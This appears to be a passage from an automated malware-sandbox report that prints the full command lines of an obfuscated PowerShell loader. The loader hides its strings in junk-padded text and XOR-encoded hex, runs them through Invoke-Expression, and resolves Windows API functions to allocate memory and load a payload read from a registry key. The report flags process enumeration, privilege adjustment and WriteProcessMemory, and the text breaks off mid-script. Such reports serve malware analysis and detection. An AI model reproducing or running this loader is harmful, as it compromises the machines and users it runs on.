CFlu3Skn6Sug3Int1Nes2Luf0Kal2Pra8Min6HerBbro1Sem7udk2Udt0Woo2Asp3Suc2Art9Pre2Sau0Uns2act6Kon3Sla1Cho2SlvCSte2KroAKap2SprBTra6VejBBor0ooz0Pla2Irr8Pen2duoCEde3Cat1Flk6AntBLaa0Ove4Mnt3Oms6Oji3Maa6Afs2Inp0gau2Pul8Opt2Unf7Fla2Fjs9vin3FlyCGar0con7Pat3Ond0Tyn2PerCpac2Par9Paa2Sta1Ova2Sho0Unc3Slu7Gri0Jtt4Ord2Det6Kas2Sta6Eft2Ryg0Uns3Bom6Unh3Ret6Red1Kap8Str7GraFSup7VerFUnc1ret7dat3Unc0Non2GolBSka6conCDod6CusBFjo0Dam1Bac2ext0Hyr2Del3Tin2PunCAll2KarBThe2Oss0Fej0Unc1Tax3IntCGeb2VilBMun2Mer4Ger2exc8Tax2HerCKon2ill6gud0Xyl8Pro2OstATel2Sta1Bes3Heb0Job2Udb9Teo2Typ0fil6TesDSan6Uaf1Sav1Opr6Imb3EntCKie2UvaBMis2Aks1Lay2Moa0Mat2Ter3Roe3hje0Del2ove9Fje2Emi1Sla2Sen0Hav3ran6Tan3Sey1fri7RidCMiz6age9Ann6Zap5Doc6Ret1Trr2Fre3Une2Tra4Unb2Apo9Bas3Deb6Vic2Lat0Aft6TagCCur6AngBItc0bur1Leu2Uns0Gey2inh3Sha2MenCSko2SpnBEsp2Jen0Exp1Sto1Dre3EklCRet3Hos5Gib2Spo0App6MonDIns6Non1Inf0Emc0Ado2SkiBPen3cos6Tri2SofBMed2Ele4For3Akt7Oho2ban9Kat2Coc0Vis2Kla1Pes7Pte5Mes6Fas9Ind6Blg5cir6uns1mck0Wha0Pos2KraBFly3Chr6Mis2AfvBSub2Tun4Bus3Tid7Sko2Mai9Mai2Unr0Dan2Cay1Pre7Amb4Lut6Dok9Ins6Zel5Ano1tatEPuj1com6cal3LeuCBif3Bra6Orm3Veh1Bad2Met0Cor2Bir8Agu6AfsBImp0Spr8Non3Bet0Pla2glu9Wit3Kil1Adr2OzoCBid2Vib6upr2Rek4Unc3Van6Tub3Uds1App0Dob1Bar2Unf0tyf2Eva9Afb2Fra0Kel2Dri2Lan2Ind4Cow3Tom1Ree2Cen0Pri1Myl8Flo6GenCStj'Uns;ConEGranOvesOddnForachlrDeglStueFledShi9Glo Cha<NonURevnSaldSneeHourCorfKisrIndaBknnSkokBroeTvarNubiPhlnleogNoneEverFignJoneFugsSuf2For;Eur<BobUVirnenddLiteVanrMasfNeorperaOpinPorkAtheskarSteimernTilgForeNatrBornUtreSirsAnd3Svi Non=Klo SanHAnaTSokBChr Ske'Tim6Tro1Eva0una2Swi3Edd0Bin2Kom9Met2Ill1Ulo3Sam3Til3Dec7Syn2Con1Abb2PaaCSpe2the0Udv2JepBthi3Fil6Mar6ApoBEle0Art1Asp2Sem0Civ2sec3Anl2RotCOgd2styBPro2Der0Val0Rig6spg2LysAcal2PreBCol3Sym6Exh3Hup1Vak3Sem7Sta3Fld0Kar2Aag6Skv3Ing1Fug2LucABil3Sim7wet6SasDMis6Gyp1Ulv1Ges6Dry3HjaCNeu2GuiBMyl2Tea1God2Cab0Paa2Har3Kre3Emi0Loe2For9Cro2Aut1unb2Hor0Sca3Pes6Ind3Ern1Giv7Rke3Neu6Hul9mic6sta5Kri1JohEBor1Non6Del3rijCTat3Sic6Fyl3Gen1dis2Amn0Lav2Cat8Pal6OliBNon1Tsa7str2Teu0gas2Cat3Mas2Elo9Non2Ban0Lya2Goo6Inh3Lic1Ind2CenCSaa2StaAEqu2DerBmas6AmaBRos0Int6Imm2Mil4Tet2Mic9Mau2Bad9Hyp2ConCBer2GenBVor2Int2Aud0Sgt6Leu2UdrAAus2FirBgrn3Mor3lit2Skr0Tak2DydBDet3Ind1vrd2OveCUnp2manARej2NonBBeh3dep6Ami1Spe8For7entFChi7IncFRes1Fil6boz3Ska1Gwe2Ven4Dia2SynBSeg2pot1Zin2Fav4Emi3Dro7Bef2The1Non6Jdi9Ken6Ver5coc6Blo1Ole0AssFSka3Ort0Ast2Ink9Smi2Cap0Div2Uns3mar2Sta0Std3Hac6Sai3Tvr1Bru2Hyd0For2OriBFin3Soc6Uti6UndCiso6SkoBMay1Stu6Unh2Pad0Srg3Bel1Ton0CryCune2pos8Cat3Top5Rea2Unp9Goe2Min0Alt2kin8Gep2Ren0Aut2KafBAph3Kon1Bls2Sla4Cot3Sea1Cle2ConCInc2LiqASta2AixBFor0Ele3Tat2For9Dis2Bal4Gum2Hus2Bys3Non6Mar6IkoDSil6Par1Dok1mia6Chi3GamCPro2VelBKar2rec1Mis2Pri0Svi2Dre3lac3Int0Dis2Fla9Mai2pha1Cau2lis0Ble3Phi6Bld3Ver1Skr7Cam2Ufo6FrsCAnn'Pos;BruERavnFjesPernTonaArcrPollRovezomdBll9Cur cat<AntUUnsnMandOomeMilrOmsfIrrrTekaOutnFrakRhaeTitrSekiDisnSubgUnceTalrUranzileMorsKat3Buf;Aik<PleUSpinNegdToaeMinrHomfRyarPisaTalnAfkkNoneSocrUdtiOvenCargKlaeFlorTrinsupeAfssLgs4Whi Rag=For RefHMatTSpeBGug Biv'Rag6Inc1Jub0Ful2bom3udh0Pel2Syl9Soi2Eje1Tec3Tid3Loc3Col7Sho2Scr1Unc2FlaCKon2Sni0Udb2OffBfor3Shi6End6StvBBip0jam1Alc2Gor0Ret2kon3Spe2NewCRow2ActBkid2Bra0Str0Bov8Cla2Cul0Abd3sem1Ans2GeaDAft2GhaARes2Thu1Tra6BunDCou6Trk1Tut0Yur0Ane2wheBNeg3Ake6Fan2FreBBok2Wor4Ski3Ind7Eri2Ina9Spr2Sho0Art2Ref1Rhi7Obt7Pla6Bre9Tre6Fle5san6ste1Dig0rev0Udn2slaBTua3Lut6Tor2HymBPot2Elo4Mic3Min7Ade2pse9Lvs2Ste0Tik2hal1Hie7Hus6Lot6Cot9Ind6Tro5Sko6Pro1Pan2Tol7Min2Unt0Pub2For4Jer2Mat2Hal2dis9San2Jur0Pak6Ecl9Fre6Sir5Dyr6Nig1Con0SpiFZap3Ang0Fug2Gan9ska2Rev0Che2bio3Ski2Pos0Gnu3Sho6Paa3Usk1Bnn2Kon0Non2CchBOpl3Kar6Abs6TroCDel6CouBSka1Ant6Hel2cov0Bir3mul1Lob0SpjCFor2fis8Apo3Kal5Str2Mar9ove2Adr0dem2Pon8Sup2Non0Sub2libBDis3Gua1Tri2Gue4Stt3Hol1Sun2LefCDiv2HarAkar2SysBTor0Pae3Ato2Udr9Job2Cal4Mes2Val2Set3Una6Tri6UteDBru6Tar1Opi1Spe6Vek3PatCBeh2JacBNon2Sel1Cel2Vid0Goy2Tid3Cum3Avl0Pat2Enf9Van2Tea1Gen2nab0Gej3Ant6Saa3Pop1Tum7Som2For6AdgCDif'Sel;AccESkinSprsComnKonaDygrTrilFuaePladSyg9Sup Fig<FisUCasnMaldSikeJvnrAysfAccrBihaNonnLibknoneComrSapiEsonKobgVugeninrBunnCameGlasPse4Ani;van<IslUGannLsgdSemeRverOpkfVarrOpeaBranKrakOpreBerrGodimednpingReseBagrSpynBeheMaasHor5Era Emu=Sli DamHvinTRamBAff Ris'Pty3bus7Aft2Tom0Bru3Int1rev3Nab0Dam3Sul7Sku2ChuBSli6Unn5Sig6mil1Stk0Ves2Udr3Sta0Jul2Aar9Far2Cho1Ast3Com3Tra3Gra7pan2Dia1Tow2VelCBra2Kim0Der2SjlBKdg3Sto6Ski6DiaBJea0Uns6Afn3Tyd7War2Afb0Ser2Out4ers3dou1Mas2Afp0Can1Sfo1Non3ReaCCem3Pot5Fra2ill0pre6BejDCon6OptCPin'Pro;VivEBefnChosrelnByraAntrWoolFraeKildTur9Exc Whe<TetUPisnProddeleAefrtumfResrForastjnAntkconeEwerSmrianlnKargUnweForrMetnLabeDrasSde5Alc Ver Ama Sti;Bra}Str<MicPXerrForoStetweeeDoesBantRessfiaaDumnTragFiseUninBrasSid Pla=afg PreHHjlTInaBbet Res'For2HanEPse2Sen0Uns3Bez7sem2UnsBFor2Und0Una2Fro9Por7Ser6Dam7Kar7Akt'pho;Kit<milUPrenmicdBreeBadrIntfCirrPolaUnhnCyskCoceSpurTaviRevnGalgRykeAnirNulnTideEugsDis6Uds Sek=Sta CenHmisTTesBInc com'lad6Hav1par0Ide3Ful2LymFTaf2Gig0Pen2Nas9Und2YacCBru2Col2Non2Hei0Gri3Bed6All6Una5Dac7mod8Sub6Bry5Ust1AntEDro1Gen6Kil3afsCCas3Gen6skr3Kan1Fol2Ent0Anh2Ant8Omt6AfsBPug1Uni7Pri3Pea0Pen2KarBStr3Hem1Sam2SniCDis2Pan8Inn2Bab0Sno6preBSod0DemCIns2AurBHow3Pin1Non2Ant0Pig3Sak7Pal2BegAPro3Pro5Spi1Per6Drm2Anf0Str3Cyt7Top3Har3Blo2LamCTua2Dyb6Alm2Fra0Raa3Aff6Sla6SprBSyn0Kon8Udf2Byl4uns3Ada7Aur3Bea6Dag2perDGha2Bje4Nat2Beg9Ste1Lef8Inw7MilFFor7FasFVrt0Fre2Suc2Sam0Mit3Lav1Dvr0Ufo1Uns2Str0Tos2Bei9Kla2Unv0etk2Ari2Hel2Bri4Z C3Oni1Ove2Kai0Usd0Mel3Ord2BigARib3Unr7Pyr0Myr3Non3Tro0Jud2SkrBEsk2Kol6Fil3Smi1Kal2ProCInt2oveANik2FolBBea1Par5Til2LilAAdr2LeaCLut2panBImp3cha1Pro2unm0Spi3Ind7Fal6AkkDSag6FasDRap2Ver3Res2NdrEUnd3Vap5Far6Tin5Fus6Tot1Pat1Lys5Lia3Ery7Tyn2FisAKla3Unf1Spk2Gat0Sta3Kem6Gul3Sol1Orl3Pus6Sko2Kem4Sid2GreBCoi2Tov2Bru2Sub0Unt2NutBrov3Sep6Imp6Bar5Res6Ser1Van0Ref0Til2EffBafb3Mic6Dem2SprBCas2Syn4Urm3Uld7Dec2Tek9Mes2Gen0Har2Ens1Akk7Tra1Iso6ElsCdat6Ber9Soc6Suk5Tru6IntDBru0Woo2Fra0Fin1Ber1Sta1mtt6Ash5Coc0Hov5Mis6StrDdeo1AasERep0BevCSpe2UdyBInd3Skr1sko1Raa5Mis3Eoz1Nus3Mul7Mnt1skr8Kom6Ufi9ill6Ads5For1AddEfng1Stb0Kar0AntCApl2AalBBuf3alk1Met7Ste6Orn7Iso7Red1Zar8Sni6Org9Avl6Plu5Skn1PauEPar1Col0Eve0SnaCErl2DilBSup3Una1Win7For6Brn7Bar7gru1Fir8Gen6Blo9Hum6Nub5Raa1AmaEskr1Udk0Und0TubCCol2NoeBink3bor1Vin7Ven6Dat7Tmr7Non1Fag8Ill6AudCLep6Uro5Fir6SloDWin1plaErre0AnsCFot2BulBOpe3Lec1omv1grn5Bar3Cip1The3Sch7Bio1Opg8Rag6UdgCStr6RepCUad6ReaCFoo'Akt;UnbEResntrysJeanUnmaartrKrolAlaeVindNon9Wce Oms<PolUIscnNyrdForeUgerLapfElerPlaaFrynMagkAsseCurrUroiBlanOstgJnaeHerrClanRegeStysfde6gaz;Pea<CajSForaMherUndcEleoRispDaylThiaBursUnctUnd1Ten4Loc7Smu Uda=Vir BeffSlikPitpVak Bam<SelEGtenSemsHownOveaPerrJenlAnceBusdPat5Tud udk<BorEneunNonsComnbaraHexrTublSteeBawdTil6Ter;Isc<KomUDecnPredSpieHaprForfSynrShaaMisnEmpkUndeAcrrSidiTwenSpegsegeSynrStanAereBalsGas7Pac Fus=Blu erhHSubTChaBDvr Sto'Sen6Kej1Til1Anl1dal2Wri4Pot2KetEHer2LinAUnw2Fag3Flu3Mic7Ove2syg0Reg2barBOil2kad0Kon7Afp6Udt6For5Coc7Sja8Vug6qui5Inf6Akt1Res0Mal3Tel2MisFBal2Van0Ove2Vap9Bod2telCOut2Pro2Sma2Eks0Ele3Tap6Mah6IncBUna0GirCBis2TipBRou3Fik3Nat2AtaAMoi2LosEHit2Rib0fej6FulDBoy1TilEApp0DemCLge2AlkBGlo3Bri1Ane1Unp5Pre3Int1Sky3Sak7cat1Res8Ran7AljFLuv7RefFVic1ManFOrd2Pho0Spo3Unc7Syn2TilAWee6Ans9Oce6Lob5Ang7Bot3jaz7Idr2Geh7VorDOme7Pre0Mul6Mim9Pro6Sio5Alg7Dec5Den3ForDCor7Pro6Sub7Glu5Hoo7Ess5Unt7Mik5Rhe6Ska9Rek6slb5lim7Uti5Luc3IsoDRid7pit1jyn7Hje5Ter6AllCNon'Aan;povEFirnDursQuenpupaUnsrStalBraeLevdAgt9Skr Ant<CarUGennHesdFateRucrUdlfDicrQuiaUnsnWarkRemePrirBokiAppnJulgHuiesulrmulnNygefassDje7Ren;Tra<BarUCocnRecdNegeNonrMikfKinrSkuaSylnVidkArreParrForiMaynKemgPaaeSolrautnskieUngsHyd8Imp man=Dis HerHFirTUniBPla nor'Olg6Kab1Sla0HjeBBil2Plu4Bih3wei1que2SnoDPho2Dec4Suc2SujBPas2Bro4Fil2Ber0Mor2Elf9Ned6Res5Non7Mad8Dep6Opm5Des6Gro1Enn0Pos3Stj2IndFGua2Fol0Rei2Opg9Mul2MarCDis2Kab2Sek2Afm0Non3Sem6Svo6BoaBFla0ChuCDra2disBBes3Krn3Cla2UdgAEth2SetETal2Sel0Lic6BecDFrd1ImmEVid0ParCDag2RstBMir3Udp1Res1Afs5Tse3Dep1glo3Kvi7Fra1Vil8Leo7PolFFeu7SanFStr1SttFTak2Bos0Fis3Fem7Del2LagAFal6Wie9mah6Trk5Pip7Hjr5Tur3SkuDAti7Fje4res7Hje5Bor7Ove5Bre7Elu5Mee7Pol5uni7Int5Int6Ops9Rid6Avi5Non7Rha5Sko3UdfDhem7Inf6Exc7Arb5par7Thi5Und7Maa5Crz6Pai9Non6Ben5Uni7Opp5For3friDPra7Sen1Car6CabCUsi'Dia;RudEStunExcsUrnnAtoaCharLerlMeteVerdPar9Lar Fed<CerUOvenStidVejeBibrCapfSkorFasaUnrnUnhkCareTrorPeniEngnOccgBageEftrUpanHeleUdlsOff8Cli;Udv<ShiCHesrUsoaSkonUnkiChooEmamSli=Tap(GalGCheePastPap-UbeIPartSoneFormCg PSkrrAmpoAfppKroeuddrRestSadyAkt Com-RemPUndaPoptTomhEnv Vic'supHLenKAltCRilUEje:Spr\RefBpserStruRemgTageMilrGeouFordCorgBulareqvFeteBru\BejSShetRomuCurdTroeRusnNymtUdfeNilrFrahBonuTheeGymrcirnFejeBrasFra8Pat5Sem'Rbe)Ark.VacJJu oApoupherRevnAeraVillMeriCalsLeumSub;Afi<OplUBygnregdAsceComrCasfDarrRevaEbuncolkGifeOblrBaliBesnbergFodeDisrKysnTeleBlosPja9ter Fan=Bla LakHAflTDetBKna Pou'Bra6Cry1Ren1Con0Tud2OmsBDop2Vrl1Dro2Dri0Sol3han7sup2yde3unh3Epp7pet2Bil4Tid2ImpBBra2VulEDek2Hom0Car3tok7Sto2DelCPla2AttBCor2Gul2Geo2Rid0Bev3Sal7Kro2FlnBTri2Opp0Eri3Ele6Blo6Mus5Prm7Pro8Pad6Unc5Ove1FolEAgn1Ban6Dos3UneCOpe3Bra6Dar3Gre1Val2Grv0Ung2Occ8Sno6TrtBNon0Rea6Kon2UnsAAnt2OpsBMis3Ony3Sig2Ilt0Brn3Res7fol3Son1Cou1Gob8Kuj7ArrFRan7SafFTan0Rev3Smr3Kom7Ove2JahATal2amb8Lng0Cle7Ant2Fri4Non3Ama6Bla2Pro0Mul7Sej3Pse7til1Pie1Non6Ind3Cha1Pal3For7Svu2DioCTve2NecBSub2Sta2Int6SynDRyt6Her1Sin0Fey6Ebo3Fol7She2Hyl4Pro2TetBUns2MisCLub2DacAGun2Jus8Aba6AdmCSpa'tyk;KroEVovnLovsScangluaSamrRotlSkaeSpldBac9Non Qui<EvnUPronBeldForeMerrKryfTudrSukaThenFunkFooeRearUdriGalnOmsgRobeWatrGalnGaleIntsShu9Krl;Non<EspCoverTwaaFilnLediCisoKonmMaa0Les Bee=Non LocHLawTChuBPis Ham'Aft1ForESup1Cir6Gal3fraCpla3Per6For3pro1Udf2Tub0red2Pos8Mod6BalBSed1Fra7Tox3Bla0Hou2SufBCir3Non1Bil2SkiCSlv2Kom8Aux2Mol0Dys6GenBRge0AfgCVar2PidBUdb3Gen1Erg2She0Wad3Ten7Ext2UniASpe3uns5Fei1por6Tom2Str0Koa3Lan7con3Und3ast2navCBes2Kos6Dis2Fej0Kon3int6Hov6MerBfra0Sal8mic2Eje4Hek3Sup7Air3Eth6Rib2PubDSvi2Kni4Ext2Kon9Opg1Hyp8Opg7PreFUnr7MirFTll0Cud6Dig2DwaAEdi3Kru5Beg3EgnCHer6TanDHje6eks1Eff1Pre0Rot2ConBPal2Ali1Glo2Cor0Cro3sko7San2Jal3Sol3jos7acr2Sam4Kar2hkeBUnd2OmnEEnd2For0Syn3Geo7Oak2FleCNon2HofBAge2Fyr2Ero2Fos0Tro3Ers7Ame2FalBPre2Joc0Ani3Sen6Sej6Nem9Sta6Hyd5Dat7Sam5Mis6bnk9Mal6Gan5Psy6Lej5For6Exc1Civ1Exc1Iso2Sti4Sup2BroEEnk2CheAMel2Per3Try3val7Sto2Non0eso2SurBGaa2Dau0ove7Cam6Fed6Fod9Vin6For5Hlq7Ulo3Obs7Nai2For7SamDDds7Pec0Ret6AgiCDir'Pot;SawEConnDepsDelnClaaFlarUdklKaeeBredHal9Kam Sej<entCBunrAktaTagnUreiSaloTrimEcp0Mod;Yuz<UrigSkooNickeruaInsrKnutPapbHalaEmpnDefeBennpaasFru=Gau<brsUOvenCladHefeFarrForfOverGesaTranPeakOpmeDatrbloiImpnAntgRgteLitrNonnAmbeArtsEnk.BercforoKnuuSupnDuctlac-Str6Kor7Art8Mar5Jun;cyt<PrcCCowrFreaFjenFreiAdaoCowmsuf1Far Jun=Pre CoeHStaTIndBHyd Kat'Eft1aneEInc1For6Com3EleCSvo3Abs6Con3Eft1Enk2Eag0Lar2Tan8Mon6fedBFol1thy7Bry3dei0Inl2SkiBLic3Sla1Rek2JubCSuc2Ghe8Rep2Sti0Sys6MyxBSrm0repCSju2ForBjac3Chy1Baa2Pra0Stu3Exe7For2KonAFil3Lse5hav1Pde6Udr2Ask0Svr3Rie7Ind3Sam3mee2DalCLil2Brn6End2Mus0Nit3The6Bed6FreBNav0Voa8Smk2Ast4Nav3for7Wis3Dad6Fra2OutDcaf2Ane4Yme2Aps9Hul1Jul8Pre7BecFNav7CynFKas0Fej6Sam2RanADea3Mar5Mis3RafCTyl6StoDPri6Unt1fod1Oss0Utr2bisBSho2vrd1Len2smi0Den3Cot7ran2Pel3For3Pub7Har2Unf4Ind2ProBFor2SurEWan2Ver0Snb3eri7Per2EirCGat2LagBEnt2Amb2For2une0Hou3Bis7spa2StiBWhe2Spl0Brn3Reg6Per6Kur9Kri6Und5Spi7Ner3Inf7Cre2Par7SygDSyn7Est0Hov6Dev9Gew6Het5Ana6Sen1Dam0StuBLeg2Pen4Rev3Sel1Lin2AkkDKur2Ane4Edv2BroBFra2Ola4Flo2Tre0Bri2Lom9Pea6Kla9Rho6Out5Rad6Cat1Uns2Gar2Adl2ShaATim2RedEKam2Fun4Bre3Leu7Lie3Rat1enm2Unr7Hun2Dua4Opr2quiBDis2Pro0Non2RrtBUnd3Jar6Paa6KriCAsy'Emi;AllEBronFodsWinnmulaHomrRedlKryeHovdhje9Zet Chi<GanCHoarArraSnonPariSaloSedmEnd1Aut;Beb<ChlCNaprTheaUndnSteiUnboStomFra2Fot reh=inc IndHSteTGleBTel Div'Smu6Len1Aro2LysAIrr3Sla3Cud2Drs0Ing3Fra7Ove2fro0Bra2Koh9Dep2Ser4dgn2Fis7Una2SumASea3Daa7Ben2Aus4Rec3Paa1Pit2Gyr0Cle2Che1Lys6Lik5Gry7Ske8Opi6Jin5Luf1UniEMyo1Eud6For3AfkCDyn3Cou6Who3Sjl1Moo2Pre0Bor2Fan8Pre6AltBOve1Gng7Svm3Bra0Vic2RepBDia3For1Lug2HovCHun2Ove8Bez2Kar0Med6CocBAdm0SerCAcr2RidBIso3Hyp1Ove2Flo0kit3imm7Dep2TheASup3Mur5Ove1Opt6Bak2Bar0Tri3Duk7Bif3Fra3Min2SidCPro2Sat6Ver2Col0Tha3Bla6Und6UnpBRef0Mac8Dec2Int4The3Tem7Bil3vve6dan2DisDPle2Bor4Ala2sec9Ret1Com8Fej7UndFapl7WomFHet0Bad2Uko2Dex0Int3Adj1Bee0Bef1Kem2Vrd0Not2Ver9Yme2Spe0Bea2Wil2Dag2Und4Dut3Eff1Jar2Pep0Ins0Ska3Spa2HovAPro3Two7The0Rec3Sim3Sma0Bim2SigBSpi2Fir6Irr3Sil1Hep2HeiCagr2LreAsym2UddBGen1Sta5Cro2SwaABec2ComCFue2UndBVil3Psy1Pom2Tnk0Tor3Tri7Tea6WilDCen6Lun1Syn1Ban1Sek2Dup4Com2LobEOpr2BegABes2fle3Tol3Kap7Pra2wad0Fet2UfiBKal2Noc0Fir7For6Pro6Mal9Ski6Unf5Akk6ComDPrv0bil2Pro0Ufo1Amb1Ber1udv6Lre5Fin0Kog5Tri6RouDSub1PlaEUne0MonCHde2PanBLam3Fli1abi1Ran5Til3Fra1kom3rrf7Len1Dis8Sak6Pro9Lar1CohEtek0InjCRav2DeaBEks3Int1Cre1Scr5Pha3Reg1Dis3Leu7San1Bub8Mal6FaiCSub6top5You6OmsDRes1GstESch1Tru3Reb2IbiASol2TidCPrv2Cha1Ove1Pol8Ign6OpiCAnt6BeaCDel6BevCfor'Unr;RebEpatnJehssalnSupaReprMenlEtyeAfrdPal9Dis Gen<ChaCFolrModaFelnCoeiMegoBatmFor2Bug;Ash<AusCSkrrBryaLstnPariburoTjemZeb3Syv Rab=Mag BruHTetTVksBEnk Vaa'Rep6Kom1Jor2KaoAFor3Che3Ple2dec0Jay3Tul7Den2Fra0Com2ped9Sma2Dif4Dry2Fur7Byg2vinAUnv3Kon7Uda2Faa4Res3Mat1Mon2Sub0Ven2Tan1Par6OrtBDol0incCDuk2AndBStn3Thi3Ver2OmbAAlc2indEMid2Ran0Oda6SkrDSkn6Mil1dry0TstBPla2Gla4Skp3Und1Lat2svrDEsp2Nex4Ris2CarBLib2uds4Her2Anl0Bre2Kol9Lag6Pro9Div6Dig1Tyv1Pen6Bes2Non4Pro3Muc7Fna2Pre6ben2EksAUdk3Kna5Bel2mnt9Hyr2Tri4Dry3ren6Ind3Mod1Ana7Kul4Skn7For1Env7Aug2Plu6ApeCKlo'Att;DebESminDissJysnUndaSporhanlDaveEucdIrr9Udk Dat<ThiCRefrFaraUncnPosiSlaoUndmBan3Sub#Fou;""";Function Craniom9 { param([String]$Vsmc89); For($Erhvervsgrupper=3; $Erhvervsgrupper -lt $Vsmc89.Length-1; $Erhvervsgrupper+=(3+1)){ $Sanikels = $Sanikels + $Vsmc89.Substring($Erhvervsgrupper, 1); } $Sanikels;}$Vexers0 = Craniom9 'BroIAppEPosXOps ';$Vexers1= Craniom9 $Sye;$Vexers1=$Vexers1.replace('<','$');$Vexers1=$Vexers1.replace('>','"""');if([IntPtr]::size -eq 8){ .$env:windir\S*64\W*Power*\v1.0\*ll.exe $Vexers1 ;}else{ & ($Vexers0) $Vexers1;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Vsmc89); $Caprylyl = New-Object byte[] ($Vsmc89.Length / 2); For($Erhvervsgrupper=0; $Erhvervsgrupper -lt $Vsmc89.Length; $Erhvervsgrupper+=2){ $Caprylyl[$Erhvervsgrupper/2] = [convert]::ToByte($Vsmc89.Substring($Erhvervsgrupper, 2), 16); $Caprylyl[$Erhvervsgrupper/2] = ($Caprylyl[$Erhvervsgrupper/2] -bxor 69); } [String][System.Text.Encoding]::ASCII.GetString($Caprylyl);}$Syndefuldest0=HTB '163C363120286B212929';$Syndefuldest1=HTB '082C26372A362A23316B122C2B76776B102B362423200B24312C33200820312D2A2136';$Syndefuldest2=HTB '02203115372A2604212137203636';$Syndefuldest3=HTB '163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B0D242B212920172023';$Syndefuldest4=HTB '3631372C2B22';$Syndefuldest5=HTB '022031082A213029200D242B212920';$Syndefuldest6=HTB '1711163520262C24290B24282069650D2C2120073C162C226965153027292C26';$Syndefuldest7=HTB '17302B312C2820696508242B24222021';$Syndefuldest8=HTB '1720232920263120210120292022243120';$Syndefuldest9=HTB '0C2B0820282A373C082A21302920';$Ensnarled0=HTB '083C0120292022243120113C3520';$Ensnarled1=HTB '06292436366965153027292C2669651620242920216965042B362C062924363669650430312A0629243636';$Ensnarled2=HTB '0C2B332A2E20';$Ensnarled3=HTB '153027292C2669650D2C2120073C162C2269650B203216292A316965132C3731302429';$Ensnarled4=HTB '132C37313024290429292A26';$Ensnarled5=HTB '2B31212929';$Ensnarled6=HTB '0B3115372A31202631132C37313024290820282A373C';$Ensnarled7=HTB '0C001D';$Ensnarled8=HTB '19';Set-Alias -name Ensnarled9 -value $Ensnarled7;function fkp {Param ($Stridsskrifterne, $Anesthaesia) ;$Underfrankeringernes0 =HTB '610423332C363120366578656D1E043535012A28242C2B187F7F06303737202B31012A28242C2B6B022031043636202827292C20366D6C653965122D203720680A272F202631653E65611A6B02292A272429043636202827293C0624262D206568042B2165611A6B092A2624312C2A2B6B1635292C316D61002B362B24372920217D6C1E6874186B0034302429366D61163C2B212023302921203631756C65386C6B022031113C35206D61163C2B212023302921203631746C';Ensnarled9 $Underfrankeringernes0;$Underfrankeringernes5 = HTB '610429262A2D2A292A282031203736657865610423332C363120366B0220310820312D2A216D61163C2B2120233029212036317769651E113C35201E181865056D61163C2B21202330292120363176696561163C2B212023302921203631716C6C';Ensnarled9 $Underfrankeringernes5;$Underfrankeringernes1 = HTB '37203130372B65610429262A2D2A292A2820312037366B0C2B332A2E206D612B3029296965056D1E163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B0D242B212920172023186D0B2032680A272F20263165163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B0D242B2129201720236D6D0B2032680A272F202631650C2B311531376C69656D610423332C363120366B0220310820312D2A216D61163C2B212023302921203631706C6C6B0C2B332A2E206D612B3029296965056D611631372C2136362E372C233120372B206C6C6C6C696561042B2036312D2420362C246C6C';Ensnarled9 $Underfrankeringernes1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Julefestens,[Parameter(Position = 1)] [Type] $beagle = [Void]);$Underfrankeringernes2 = HTB '61023029213337212C202B366578651E043535012A28242C2B187F7F06303737202B31012A28242C2B6B0120232C2B20013C2B24282C26043636202827293C6D6D0B2032680A272F20263165163C363120286B172023292026312C2A2B6B043636202827293C0B2428206D61163C2B2120233029212036317D6C6C69651E163C363120286B172023292026312C2A2B6B00282C316B043636202827293C07302C29212037042626203636187F7F17302B6C6B0120232C2B20013C2B24282C26082A213029206D61163C2B2120233029212036317C69656123242936206C6B0120232C2B20113C35206D61002B362B243729202175696561002B362B24372920217469651E163C363120286B083029312C262436310120292022243120186C';Ensnarled9 $Underfrankeringernes2;$Underfrankeringernes3 = HTB '61023029213337212C202B366B0120232C2B20062A2B3631373026312A376D61163C2B2120233029212036317369651E163C363120286B172023292026312C2A2B6B062429292C2B22062A2B33202B312C2A2B36187F7F1631242B212437216965610F30292023203631202B366C6B1620310C2835292028202B3124312C2A2B03292422366D61163C2B212023302921203631726C';Ensnarled9 $Underfrankeringernes3;$Underfrankeringernes4 = HTB '61023029213337212C202B366B0120232C2B200820312D2A216D61002B362B243729202177696561002B362B2437292021766965612720242229206965610F30292023203631202B366C6B1620310C2835292028202B3124312C2A2B03292422366D61163C2B212023302921203631726C';Ensnarled9 $Underfrankeringernes4;$Underfrankeringernes5 = HTB '37203130372B6561023029213337212C202B366B063720243120113C35206D6C';Ensnarled9 $Underfrankeringernes5 ;}$Protestsangens = HTB '2E20372B20297677';$Underfrankeringernes6 = HTB '61032F20292C2220366578651E163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B082437362D2429187F7F0220310120292022243120032A3703302B26312C2A2B152A2C2B3120376D6D232E35656115372A3120363136242B22202B366561002B362B2437292021716C69656D02011165056D1E0C2B311531371869651E100C2B3176771869651E100C2B3176771869651E100C2B317677186C656D1E0C2B31153137186C6C6C';Ensnarled9 $Underfrankeringernes6;$Sarcoplast147 = fkp $Ensnarled5 $Ensnarled6;$Underfrankeringernes7 = HTB '6111242E2A2337202B207665786561032F20292C2220366B0C2B332A2E206D1E0C2B31153137187F7F1F20372A696573727D706965753D767575756965753D71756C';Ensnarled9 $Underfrankeringernes7;$Underfrankeringernes8 = HTB '610B24312D242B24202965786561032F20292C2220366B0C2B332A2E206D1E0C2B31153137187F7F1F20372A6965753D7475757575756965753D767575756965753D716C';Ensnarled9 $Underfrankeringernes8;$Craniom=(Get-ItemProperty -Path 'HKCU:\Brugerudgave\Studenterhuernes85').Journalism;$Underfrankeringernes9 = HTB '61102B2120372337242B2E20372C2B2220372B20366578651E163C363120286B062A2B33203731187F7F03372A280724362073711631372C2B226D610637242B2C2A286C';Ensnarled9 $Underfrankeringernes9;$Craniom0 = HTB '1E163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B082437362D2429187F7F062A353C6D61102B2120372337242B2E20372C2B2220372B20366965756965656111242E2A2337202B2076696573727D706C';Ensnarled9 $Craniom0;$gokartbanens=$Underfrankeringernes.count-6785;$Craniom1 = HTB 